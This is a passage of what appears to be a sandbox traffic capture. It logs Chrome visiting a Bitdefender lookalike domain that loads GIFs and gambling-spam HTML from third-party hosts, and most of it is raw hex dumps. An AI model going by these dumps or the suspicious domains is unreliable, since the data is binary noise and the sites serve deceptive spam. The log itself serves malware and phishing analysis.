                                                                                                                                                          2024-06-09 22:40:32 UTC16384INData Raw: 6b 28 1a 4b a8 06 0a 53 42 be 42 4c 65 5d 56 21 5c 56 9f c0 90 24 e4 50 67 9d 56 bd 59 91 00 11 17 6c 0d 97 b7 98 91 19 61 2c 6e b5 0b 22 0a d7 22 1a 57 71 2d d7 ce 22 57 25 6a 08 0a 5a 57 76 95 cd 7f 6b d7 41 3c 8d 75 1d a3 88 90 d7 d1 8a d7 78 7d 88 6a 10 0d 0a 6a d5 ee f0 86 74 d5 8e 8b 19 58 31 1a 58 83 3d 58 84 15 87 6f 08 d6 4d 95 84 e0 48 08 00 48 a5 76 50 07 69 78 06 23 e9 fa a9 67 08 9f 48 50 07 47 48 86 40 89 84 64 28 87 00 42 88 50 b5 14 69 10 1f 06 7c 1f 51 65 9a 80 00 00 21 f9 04 05 0a 00 ff 00 2c 06 01 1e 00 23 02 29 00 00 08 ff 00 ff 09 1c 48 b0 e0 16 1b 43 86 08 53 08 67 42 c1 87 10 23 42 c4 52 04 45 02 14 15 2f a2 90 c8 b1 e3 c3 2e 17 33 62 84 e4 b1 a4 40 48 70 20 0d 41 49 32 a2 ca 97 0a 4d ca f4 d8 65 e5 ca 94 03 66 72 c4 92 30 65 42 9d
                                                                                                                                                          Data Ascii: k(KSBBLe]V!\V$PgVYla,n""Wq-"W%jZWvkA<ux}jjtX1X=XoMHHvPix#gHPGH@d(BPi|Qe!,#)HCSgB#BRE/.3b@Hp AI2Mefr0eB
                                                                                                                                                          2024-06-09 22:40:32 UTC16384INData Raw: ef 84 ab 5d bd 2f 97 bb 1a 0a c5 66 01 c6 55 86 1a 23 5c 1b d4 2e 40 86 38 b8 11 09 82 00 00 50 c1 39 07 38 c0 d1 8c 76 80 c3 04 cd 66 01 10 22 f1 a9 67 08 42 21 0c e1 83 04 74 de 89 1e 00 20 21 25 98 77 07 9c 3b 8d 66 40 37 12 cf 58 3a cd 63 90 10 70 6c 23 38 cd 00 c7 a5 57 b4 0d 53 98 e1 1b 41 2d 87 38 4a ca 63 bc fb 3a ef 7b 67 c8 b8 d9 ba 77 51 43 e1 1a d8 f8 46 39 aa e1 8d 6f 88 43 04 7a f7 b5 8c 0b 17 60 06 f7 64 c7 8c 1f b7 82 25 e4 77 76 53 5e f3 79 5f 08 e6 01 8f 77 97 50 93 16 e3 ce bb 0f bc 75 fa 6c 3d 1c ef 8e 37 2c 5a a0 e0 79 51 43 ce b0 98 eb 7b e6 e7 5a 44 d8 f3 dd f3 0c 59 a7 df 4b ff 80 89 da 77 a2 e4 0c 79 fd c3 3b ff 0f 0d 44 e3 21 3e 10 75 ed 8f ff fc df 41 04 b4 a4 17 28 1d 9b 4f d7 85 4e df f9 ec e6 39 32 aa 81 1d 8d fb da 34 61 5a
                                                                                                                                                          Data Ascii: ]/fU#\.@8P98vf"gB!t !%w;f@7X:cpl#8WSA-8Jc:{gwQCF9oCz`d%wvS^y_wPul=7,ZyQC{ZDYKwy;D!>uA(ON924aZ
                                                                                                                                                          2024-06-09 22:40:32 UTC16384INData Raw: 22 91 0e 9c 51 22 b9 74 e9 86 a2 c1 66 19 73 c2 b9 cd 1b 77 bc 09 ff 2a 0d c4 ee c1 fa ea ac b7 d6 ba eb 63 b1 66 35 8d 5d cb 41 07 19 72 ae 31 a7 1c 6e a6 fd 9a d5 01 22 f2 b5 d7 a0 c6 5e b5 c6 00 07 b4 60 ab af b9 f6 bb 6f c0 c5 7e 1b 60 86 7a 5a 90 ae c0 c1 fe db 6b c6 c1 76 a2 c6 33 d3 e5 c1 f1 55 dd 95 51 19 1e 1a 7e 1b c7 cb 17 57 fc 6d 20 bb 56 b1 6f a2 10 df ba 2c 2b 1a 07 6c 60 cc 14 8f 86 f5 88 46 be 87 4a bf f9 d1 c0 04 28 4c 70 21 99 06 bd 46 22 b4 68 dc c6 fa e2 4b 97 10 7c 78 8c 96 b0 3b 28 17 96 68 fe 79 e7 9d 4f 3d ec 1d b8 4b c6 1b ab 1f 92 e9 22 71 bc 89 a6 3e 6e 98 01 07 00 41 24 39 28 a1 73 ce e9 c5 a6 67 d4 99 66 7c 49 9a 09 07 1c 49 76 1e 5c f5 c4 3d 5f 5c 84 68 da 29 7f 19 76 48 02 18 4c 23 60 38 ae c1 8d 39 71 27 1a 40 9b 59 bc 9c
                                                                                                                                                          Data Ascii: "Q"tfsw*cf5]Ar1n"^`o~`zZkv3UQ~Wm Vo,+l`FJ(Lp!F"hK|x;(hyO=K"q>nA$9(sgf|IIv\=_\h)vHL#`89q'@Y
                                                                                                                                                          2024-06-09 22:40:32 UTC16384INData Raw: 76 c2 f0 b2 c7 25 13 b2 6c 5b 31 bc 72 80 fa 94 06 b1 7a 58 90 19 a8 b4 01 a6 64 10 bb 6c 8c be c7 6c 4f 2d 1a 1b 25 3d e9 25 53 87 90 8c 23 50 e6 4f dc 73 dc 66 e6 37 09 b5 ce 48 65 c9 36 65 c9 16 af 8d 16 d6 d4 27 c5 62 e4 2e 3e fc 0f eb 42 0e ef 10 ac c5 43 0c 9e 20 3d a1 e0 24 51 62 14 0a ff 0e 26 dd 47 10 af a0 2f 67 20 10 45 da 11 8c fd 0f cc 90 1a 0c c6 3f 1e 21 0c 80 6e 81 f8 27 10 de b0 0c cd d0 0c d6 da 1e 9b e6 db 12 b1 53 a7 1d b0 8c 7c 87 ef 20 5a ad 4d 1f 6d e5 0b be 39 c9 62 f7 5a 7d 86 05 26 59 92 ba 4e 92 1f 73 0a 6c 74 80 7f 34 02 48 f9 8d 04 f7 04 c1 6a dc 59 8a 11 45 1e 13 ee 10 13 f9 4d 6d 93 c7 e4 20 eb 5c 84 ba 69 d0 2d e5 a5 0d a9 24 72 e5 90 9a 2b b1 a2 e5 4a e5 d3 2f 58 2c af 4b 3d ae 5a 43 e8 ce 36 69 3e 6f c0 fb 15 1e ca 84 7d
                                                                                                                                                          Data Ascii: v%l[1rzXdllO-%=%S#POsf7He6e'b.>BC =$Qb&G/g E?!n'S| ZMm9bZ}&YNslt4HjYEMm \i-$r+J/X,K=ZC6i>o}
                                                                                                                                                          2024-06-09 22:40:32 UTC16384INData Raw: 00 e0 2c d6 3e f4 d2 81 2f 0c a4 8a 90 08 be 11 0a 64 2b 23 74 e0 43 47 ca 84 fe 08 23 00 6e b9 4d eb 9f 68 21 f3 a5 db 6e 9d 15 36 4b 83 02 10 08 1d 62 33 db 40 a0 ed 98 0d 2c dc 89 30 fc f0 33 7b 6c 42 c2 43 10 59 3c 29 5f 95 90 d8 f1 45 8e 5a 5c 51 a5 11 cd 41 a6 1a 64 bc 19 0a c7 8e 06 f1 09 62 8e 8e ca 48 b8 1e a7 d2 58 63 8c 22 f0 cb 97 a7 ae 89 a6 2c 6f a2 c9 48 ac b3 e8 12 6e 99 7f 64 c9 6c 2c 0d 3c 06 6b 84 27 83 85 eb 9f 94 bd f1 86 9c 7f 20 18 50 a1 02 31 12 e4 9f 5e 24 91 04 4e 0d d4 99 06 1c d1 e0 94 4c 12 35 2c cb a8 ce 7f 36 93 ff 44 9d 3e f9 dc 54 12 4d c8 71 c7 d0 a3 55 03 a6 9d 72 96 51 f4 1f 66 d4 51 67 36 b4 a7 b9 0d 9b 7f ae d9 89 19 6c 92 11 87 48 8c 54 e6 2a 1a b8 13 e2 e6 99 47 3d 93 46 99 f7 cc f1 ca 82 9c c8 89 46 9c 56 37 f1 26
                                                                                                                                                          Data Ascii: ,>/d+#tCG#nMh!n6Kb3@,03{lBCY<)_EZ\QAdbHXc",oHndl,<k' P1^$NL5,6D>TMqUrQfQg6lHT*G=FFV7&


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          11192.168.2.549721103.85.191.784434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:30 UTC627OUTGET /uploads/94c3b0fa5cb4f8bbeb3618f9358d7414.gif HTTP/1.1
                                                                                                                                                          Host: www.image110.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: http://www.bitdefenderlogin.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:31 UTC348INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:30 GMT
                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                          Content-Length: 318019
                                                                                                                                                          Last-Modified: Fri, 15 Mar 2024 03:24:31 GMT
                                                                                                                                                          Connection: close
                                                                                                                                                          ETag: "65f3bf6f-4da43"
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:40:30 GMT
                                                                                                                                                          Cache-Control: max-age=2592000
                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:31 UTC16036INData Raw: 47 49 46 38 39 61 e8 03 64 00 f7 ff 00 df b2 95 66 a1 86 00 4c 2a 2a 8b 5a 5d 6a f2 f7 e7 77 f7 d6 35 a1 0c 18 a6 c8 b4 ff f7 db d8 15 29 ff de 86 35 50 f9 ec ec fb d8 60 27 e7 e7 ec f9 dd c9 ff ec c9 d4 d4 b1 52 2d 23 d7 d6 dc d3 ce 8f a1 a0 2e ff ef b9 c8 c6 cb d6 e7 dd 94 71 5d ff de 77 5c 46 35 0c 71 47 ef ce 22 a7 a5 a8 b9 b8 bb 56 4b 46 63 96 6e 63 8e 4b a7 b6 8c ef ce 08 f0 69 57 60 5d a0 08 07 06 d2 b9 4d 1f 38 e0 ae b6 ff 84 af 97 d4 c9 6f 9a 97 98 a7 b1 6f b4 b1 ca 8e 96 ff a9 aa 4e 19 2a af 21 7a 4d fc b6 48 68 55 4d ba d5 c4 76 72 74 4f 92 70 ff f7 e7 b0 50 18 ff ce 44 cb b8 32 92 af 70 fc ad 6e f0 2e 3f 31 2b 29 fb d9 bc 11 5f ab 67 85 30 f3 8e 4f 73 84 fe aa 9d 97 f4 ab 34 9d 73 95 cd b3 6e 90 b8 a3 de de e5 88 85 86 fd ea d7 af 8f 72 ef 95
                                                                                                                                                          Data Ascii: GIF89adfL**Z]jw5)5P`'R-#.q]w\F5qG"VKFcncKiW`]M8ooN*!zMHhUMvrtOpPD2pn.?1+)_g0Os4snr
                                                                                                                                                          2024-06-09 22:40:31 UTC16384INData Raw: 4e d3 74 49 c7 71 3f 88 d8 1c af 18 11 93 86 7b 42 4c 06 96 6f 6b 31 2b 08 79 8c a6 c1 27 b1 10 dd eb 9e 45 ec 9a a0 24 fb 05 53 87 2b 44 51 47 03 c5 13 b9 f2 8c 64 ad 48 0f d4 34 50 33 43 0f 60 4d 07 8c c0 59 eb f4 f1 a2 34 5c b7 34 89 ec 83 3f fc 34 5c 43 af 59 c7 f5 08 ec 47 59 db f5 48 ab 10 73 c4 b5 59 6f 81 5a 5b 40 5e e7 74 c9 74 e4 41 c2 f2 62 3f 56 da 4c 6c 57 18 c2 36 6c 83 36 9c db b9 6d 80 4f 9c 73 2d bb c0 11 b8 ff 49 1b a0 02 08 54 81 1b e5 2f 69 17 a9 fe 96 76 91 16 e9 91 82 c0 4f 51 69 96 3c 4e 44 7c 00 13 d0 d1 21 6a a9 b2 31 9b 1f 3c b0 37 4f c1 13 d9 84 9a 5e 30 9a a2 01 9c 42 15 2a 50 a2 0e d8 c2 45 88 40 02 44 00 73 4b c0 08 14 92 4f f8 80 0c 00 45 d5 a6 72 0c 27 85 53 d4 b0 3f 7f 2d 24 49 31 c1 cd 26 32 f2 30 c1 1c cf c2 58 6a f8 9d
                                                                                                                                                          Data Ascii: NtIq?{BLok1+y'E$S+DQGdH4P3C`MY4\4?4\CYGYHsYoZ[@^ttAb?VLlW6l6mOs-IT/ivOQi<ND|!j1<7O^0B*PE@DsKOEr'S?-$I1&20Xj
                                                                                                                                                          2024-06-09 22:40:31 UTC16384INData Raw: b1 c0 68 50 cc db c2 77 22 dc 9f 7a 55 dc 4a 64 7f a0 4c 6a f2 a4 e2 dc 49 e4 1c 04 b7 fb 06 d1 71 c2 5c b7 14 f6 a3 6f 61 d5 f9 e3 18 cd a3 36 bb a2 75 da 27 bb a2 11 d8 95 5a bc 2d 77 eb 2c 59 e5 9a b0 5b b6 d9 f5 58 c6 89 53 02 14 55 7e f9 15 7c d6 49 9a a2 8d 7b 74 51 eb 50 0e 8e 23 c5 80 8f 94 68 8e 62 e0 67 b8 3f 57 9d a1 85 c9 9a c1 cc fc f2 cf c7 cc 0f f1 d9 9e 61 88 f4 e3 ef 02 fd f9 e3 ab 7a 55 a1 c4 af 84 7e fe d5 2f 9f 56 f1 e5 af 3d f0 e9 9f fc d0 a7 2a fc d1 6d 77 3d 41 da 7a 88 d2 b7 68 55 6e 2a dc e2 47 53 28 88 13 c8 35 05 5c 0b 6c 8b b7 14 43 ff 03 10 28 49 84 78 c8 00 8b 72 52 42 12 e2 e1 01 39 01 9c 63 76 32 a4 a3 30 22 83 7b e1 89 b7 68 b0 42 c2 78 8e 42 b6 c8 41 bf f8 01 c3 0d 49 a6 69 43 94 5a d3 16 56 44 24 12 d1 34 1d 53 ca 66 1a
                                                                                                                                                          Data Ascii: hPw"zUJdLjIq\oa6u'Z-w,Y[XSU~|I{tQP#hbg?WazU~/V=*mw=AzhUn*GS(5\lC(IxrRB9cv20"{hBxBAIiCZVD$4Sf
                                                                                                                                                          2024-06-09 22:40:31 UTC16384INData Raw: ff 3d 63 3d 61 7b df 1b 4d 13 5b d3 86 95 93 45 f6 54 b8 a1 fd 20 40 40 a9 78 da 64 64 dc b4 1a cf b8 a9 47 c3 71 90 63 3c e4 98 f0 1e 2a 36 2e 72 94 9f 5c e5 19 17 39 8f 0f cc 0f 95 c2 1a 80 02 a4 75 01 8f cc 99 24 73 66 ca cf f6 4a 01 bf 71 c1 0d 99 b0 a8 d7 ca 56 79 59 c4 f3 ec 9a 70 1f d3 f6 4e 77 bd 72 85 91 b3 7c e5 51 d7 b8 b9 41 e2 83 a9 a7 5c ea 5b 07 b9 0f 44 62 08 aa 6b 3d ec 98 b8 c2 4c b2 7e 76 ae 8b 5c db 51 5c f2 09 9d 1b 6f ce 48 a1 cf 09 06 ae f4 3c 65 0a 97 1b f4 64 79 6a c8 f4 fa ce 1b f6 28 16 52 94 58 01 e1 09 df 46 7e 48 c3 f0 85 67 fc a2 36 c2 58 08 65 44 e2 03 de f4 c2 1f 85 31 d3 ba 03 e3 9a cf 7c 32 42 2d 9a cd 87 be f3 a3 4f 06 19 36 42 7a ce 27 23 f5 ab 17 bd ea 4b 5f 45 8a bc 1a c8 ec f9 a4 71 9d 18 94 0e e5 1e 01 ba ef 90 b3
                                                                                                                                                          Data Ascii: =c=a{M[ET @@xddGqc<*6.r\9u$sfJqVyYpNwr|QA\[Dbk=L~v\Q\oH<edyj(RXF~Hg6XeD1|2B-O6Bz'#K_Eq
                                                                                                                                                          2024-06-09 22:40:31 UTC16384INData Raw: 84 b9 f0 49 bb b9 c3 b9 e8 01 67 60 06 f5 2c d2 23 35 52 c7 60 49 01 b8 82 47 34 d2 27 4d d2 a4 70 52 24 8d d2 47 ec 04 ce d0 80 24 dd d2 47 1c 81 13 29 d1 7c cb cc 9c 20 49 e6 1a 82 f5 00 4f e8 14 8a 4b 8b 2c ff 34 35 14 86 78 ca d3 f3 c5 85 30 bd c4 d8 ca 19 ac 89 10 93 86 9d e0 3d a3 e4 d2 2a 75 86 03 15 1f 4b b0 d2 3f 65 86 24 eb 87 01 2d d4 24 b5 84 b1 54 02 45 8d d2 06 7d 54 24 7d 82 b1 4c 01 28 7d d4 e8 b9 87 4b dd 54 f5 64 54 f1 51 02 3f bd 54 0b 5d 2d a4 bc be 7c d4 29 06 e0 d0 0e a5 d1 b1 72 8a c0 a2 a5 ad 80 c3 ee 02 4a cd a4 43 9c 28 3b 86 dc 8a 5f b2 33 1f d9 09 a3 da 09 1b 6d 0a 3f 3c 21 1a 40 1c 3f f4 06 20 d9 11 f5 da 1c 0e 7a 4d c7 48 81 f9 54 4f 69 9d 4f 26 d9 02 0b b0 56 6c bd 56 30 b0 80 72 12 80 1e 98 56 70 4d cf a4 f8 d6 68 2d d7 1e
                                                                                                                                                          Data Ascii: Ig`,#5R`IG4'MpR$G$G)| IOK,45x0=*uK?e$-$TE}T$}L(}KTdTQ?T]-|)rJC(;_3m?<!@? zMHTOiO&VlV0rVpMh-
                                                                                                                                                          2024-06-09 22:40:31 UTC16384INData Raw: d6 4d ab ce 5e ac 3e 6b dc ec 62 b2 5e eb ab 36 bd d1 f8 c4 86 2a 63 d9 78 e1 02 e6 8c b5 c5 4e ad 08 06 6f 88 96 b9 1a 65 ad 34 42 b3 5d 1b 28 ba e3 52 ea 63 23 e3 63 91 08 3e 28 5c d3 52 66 eb af 66 68 ff 44 eb ab c6 cd 07 96 6c af 16 09 c7 3e eb 48 9e 6c ce 66 de fa eb 01 cb c6 ea 4c 0e 6d dd 24 c8 ce 46 eb 4f a6 89 44 a0 08 80 ce d8 9f 98 4f 1b 91 3b bd 9a 4d 9a 66 5d 39 49 5d 1e e5 bb 98 01 0f da e5 08 ff c1 e3 cc d8 23 b0 04 79 40 5d b6 6d 8e 50 4d 7e c0 4c 3a 21 e6 82 8a ce 60 69 00 aa 06 0d 0f 68 66 77 98 6e 58 a8 6e ea 66 2d 25 b8 6e eb c6 6e ee ae 62 87 f0 03 ef 1e 6f eb ce de ee 3e ef 66 1e 67 ea 46 6f ee 3e e7 1b 45 d9 32 0e 8e 4b a9 4e b9 ba ce ee 40 53 16 88 aa ed 52 df f7 0c ec 07 68 0a 29 c0 5f 3c 06 8a 5f 5b be 66 53 96 ff 05 89 d8 61 4b
                                                                                                                                                          Data Ascii: M^>kb^6*cxNoe4B](Rc#c>(\RffhDl>HlfLm$FODO;Mf]9I]#y@]mPM~L:!`ihfwnXnf-%nnbo>fgFo>E2KN@SRh)_<_[fSaK
                                                                                                                                                          2024-06-09 22:40:31 UTC16384INData Raw: 86 b6 0b b9 60 3d 28 39 9c 04 ed ee 68 66 0c 9b 01 2e 36 c9 61 25 73 97 5f 7d 62 58 79 70 b6 ce 0d cb 88 7e d6 0f 75 eb 73 b1 3f d7 bd d5 05 ed c4 1f 19 58 16 9f d1 72 46 23 9b 05 0f 03 ec fe bd c9 89 78 90 e2 cc 78 d4 7d 2e 92 0b f7 f2 53 98 5f 7e 4a 1f 85 d4 12 7f fc 54 c4 c2 47 35 11 38 91 37 16 61 f4 d1 5d 1f cd e7 cf 5e 13 2a 84 60 54 79 71 94 c3 52 22 c4 67 9f 42 05 0e f8 5e 43 61 18 60 95 07 27 46 93 a2 55 70 b1 b8 a2 8a 2c 12 b1 90 05 2f da 78 e2 8c 0a c1 88 62 8c 06 bc a5 10 11 3b 0a 99 62 5d 48 fd 97 d1 0d 0f 8d 24 60 43 47 92 08 51 19 c3 90 57 d9 69 19 ad 40 5b 61 46 50 86 65 61 a1 4d 74 db 6a 2a 5d c9 ff 65 61 d2 58 f9 91 34 04 18 16 c7 47 62 88 f1 49 1c 6e 9a 79 de 67 93 a9 d4 00 03 5e ce 86 65 6b fc 78 b6 da 28 43 f6 d8 9b 61 47 dc c8 a3 07
                                                                                                                                                          Data Ascii: `=(9hf.6a%s_}bXyp~us?XrF#xx}.S_~JTG587a]^*`TyqR"gB^Ca`'FUp,/xb;b]H$`CGQWi@[aFPeaMtj*]eaX4GbInyg^ekx(CaG
                                                                                                                                                          2024-06-09 22:40:31 UTC16384INData Raw: c8 00 7d 62 a5 71 54 cd ce 96 d8 46 af c4 29 c5 ac 82 ff 8b 18 09 e3 4a c2 21 41 82 84 b5 89 03 b6 c4 30 57 9e 00 11 60 c8 d8 85 38 01 3b 3a c0 3a f1 04 82 fd 6b 60 c5 79 86 a4 a4 20 b1 83 15 a7 13 b5 f0 d8 c9 22 b6 42 56 40 2c 65 05 db 54 ae 26 09 36 67 ed e0 54 00 2a 94 34 9e 55 64 79 7a e3 4c b0 97 81 3c b0 b2 50 0c 6c 19 41 5e 6b 93 88 1e d4 99 34 93 c2 45 63 26 db d2 62 a7 6c 57 3b 2c 70 c5 69 ac 03 66 36 b0 43 1d 88 d3 30 ab 5c c0 42 cd 10 cb 75 ac 24 f7 d1 81 e0 52 b6 54 8e 5d 6e 01 d9 47 5d c4 c2 63 24 db 15 ec 4f 89 63 95 85 8a 97 aa 34 13 ca 2b 9d 3a 95 7d cd 92 b7 d9 01 61 f0 86 77 a3 af 44 93 5d d9 79 61 34 6f 32 98 fc ba f7 2b 60 a1 e6 34 a3 aa 14 06 68 55 36 8e 99 6f 7f b3 03 af b3 e8 03 19 e5 40 46 83 1f 1c 61 64 98 b3 1f 27 90 b0 83 21 9c
                                                                                                                                                          Data Ascii: }bqTF)J!A0W`8;::k`y "BV@,eT&6gT*4UdyzL<PlA^k4Ec&blW;,pif6C0\Bu$RT]nG]c$Oc4+:}awD]ya4o2+`4hU6o@Fad'!
                                                                                                                                                          2024-06-09 22:40:32 UTC16384INData Raw: 15 86 0a f0 5b 2e c6 e2 2d ea 62 19 f2 62 65 d4 a2 30 06 e3 30 ae a2 31 46 97 4a 04 20 96 4c 99 4a cc a0 6c 09 c4 22 5a 23 22 1a 84 0e 36 44 b7 7c 55 a7 2d 84 ff e0 de 2f 4d 04 1f f4 ca af ec 41 43 7c d5 d1 35 44 7c 68 d5 42 50 da aa 1d 9f 45 18 ce 42 8c d0 03 6c ff 21 43 f4 9e 17 e2 85 f4 a5 83 31 f8 23 40 fe e3 3f 6e 9d 00 a4 43 40 1e a4 40 22 24 40 f6 61 43 08 00 f9 25 24 44 2a 64 44 ce 21 44 9c 9a 82 4c 85 ee e1 d3 cb 81 cd 30 34 c2 30 0c c1 0c 0c 41 51 a9 80 16 dd ce 96 7c 51 46 dc 9d 6b 21 14 4a e6 dd a0 01 9e 1a 55 46 f1 6c c6 69 38 a0 c7 f0 9f 50 5d 62 3f cc c0 09 48 a4 4f 46 a4 31 98 c1 0c 74 d7 0c 68 01 50 fe a4 42 36 41 2f ee 9b 16 20 e5 51 42 a4 06 2c e5 4e 1a a5 53 22 a5 52 f2 5d 46 40 23 96 30 00 25 e0 64 03 a8 89 48 86 e5 0c 08 46 07 78 cd
                                                                                                                                                          Data Ascii: [.-bbe001FJ LJl"Z#"6D|U-/MAC|5D|hBPEBl!C1#@?nC@@"$@aC%$D*dD!DL040AQ|QFk!JUFli8P]b?HOF1thPB6A/ QB,NS"R]F@#0%dHFx
                                                                                                                                                          2024-06-09 22:40:32 UTC16384INData Raw: ca 88 ef 64 7c c1 45 2a 89 8b ee 00 2d 5c 2e f5 b6 af fb be 2f fc 62 ee e7 de a7 19 64 69 d1 96 c0 fd e6 ef 97 96 00 12 68 c1 22 cc af 6a f8 ec 0c 2c c2 13 74 82 fe da ef fe 26 b0 3e 3c 81 ef 2e 6d 42 cc 6f b5 0e 2f 02 4f 30 fe 2a 70 09 f4 ee fc 26 ef 34 7e 2e 0e d4 6f 05 53 f0 01 e3 af 0c 34 41 06 a7 86 00 23 ea 0b 18 b0 05 87 f0 b5 76 42 13 1c ea e7 c6 6f 46 49 ac 82 5e 2a 92 dc 89 5f 92 ac e1 fa 51 dd bd cc 44 71 0f 64 64 02 6f fd 80 12 04 60 e4 de ea 5a b8 ff 85 67 b0 af 0c 37 b1 13 3f 31 14 17 d0 09 5b a9 16 a4 00 12 ec 6e 0f 98 41 13 d8 6d 09 9b 30 04 cf c0 29 68 81 19 74 42 f1 72 2b 8a 69 41 03 df ed 58 7c f1 29 68 80 19 e4 6e 19 77 c2 c6 9e 80 c0 02 70 00 7f 31 0e 54 71 19 5f 6b 0a 3c 01 0e d4 71 0c df 31 04 9f 80 18 93 b1 ee 6e ac 06 a4 b1 03 47
                                                                                                                                                          Data Ascii: d|E*-\./bdih"j,t&><.mBo/O0*p&4~.oS4A#vBoFI^*_QDqddo`Zg7?1[nAm0)htBr+iAX|)hnwp1Tq_k<q1nG


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          12192.168.2.549727103.234.73.284434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:30 UTC748OUTGET /nlp/index.php?keyword=%E6%89%93%E9%B1%BC%E6%AD%A3%E8%A7%84%E5%B9%B3%E5%8F%B0%E5%8F%AF%E6%8F%90%E7%8E%B0-%E4%B8%AD%E5%9B%BD%E6%9C%89%E9%99%90%E5%88%86%E5%85%AC%E5%8F%B8&from=pc&originUrl=http%3A%2F%2Fwww.bitdefenderlogin.com%2Fhome.php&referer=&userAgent=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F117.0.0.0%20Safari%2F537.36&v=1530 HTTP/1.1
                                                                                                                                                          Host: www.698jbwad.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:30 UTC443INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:30 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Powered-By: PHP/5.6.40
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                          Access-Control-Allow-Headers: Authorization,Content-Type,Accept,Origin,User-Agent,DNT,Cache-Control,X-Mx-ReqToken,X-Requested-With
                                                                                                                                                          Access-Control-Allow-Methods: GET,POST,OPTIONS
                                                                                                                                                          2024-06-09 22:40:30 UTC6208INData Raw: 31 38 33 33 0d 0a ef bb bf ef bb bf ef bb bf 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 23 68 65 61 64 20 69 6d 67 20 7b 70 61 64 64 69 6e 67 3a 31 70 78 3b 6d 61 72 67 69 6e 3a 31 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 36 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 35 70 78 20 23 63 63 63 63 63 63 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 64 69 76 20 69 64 3d 22 68 65 61 64 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 22 3e 3c 61 20 68 72 65 66 3d 22 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74
                                                                                                                                                          Data Ascii: 1833<style type="text/css">#head img {padding:1px;margin:1px;border-radius: 6px;box-shadow: 0 0 5px #cccccc;border:1px solid #ccc;}</style><div id="head" style="width:1000px;margin:0 auto;"><a href="" rel="nofollow" target="_blank"><img src="ht


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          13192.168.2.549728103.85.191.784434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:32 UTC627OUTGET /uploads/76e03c9fd7b7420306571ee61698b7ce.gif HTTP/1.1
                                                                                                                                                          Host: www.image110.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: http://www.bitdefenderlogin.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
